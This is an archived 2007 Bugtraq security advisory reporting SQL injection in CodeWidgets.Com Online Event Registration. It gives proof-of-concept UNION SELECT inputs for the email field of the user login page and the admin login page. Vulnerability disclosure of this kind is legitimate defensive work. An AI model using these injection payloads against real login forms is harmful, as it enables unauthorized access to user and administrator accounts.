[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Aria-Security.Net] CodeWidgets.Com Online Event Registration Multiple login SQL Injection
From: Advisory@xxxxxxxxxxxxxxxxx, "[ NO REPLY ]"@securityfocus.com
Date: 23 Oct 2007 22:43:45 -0000

http://Aria-Security.Net
-------------------------------------
CodeWidgets.Com Online Event Registration

Poc
Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net

Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net


Credits Goes To Aria-Security Team
Regards,
The-0utl4w

Prev by Date: Aleris Software Systems Web Publisher Calendar SQL injection
Next by Date: rPSA-2007-0222-1 cpio tar
Previous by thread: Aleris Software Systems Web Publisher Calendar SQL injection
Next by thread: rPSA-2007-0222-1 cpio tar
Index(es):
- Date
- Thread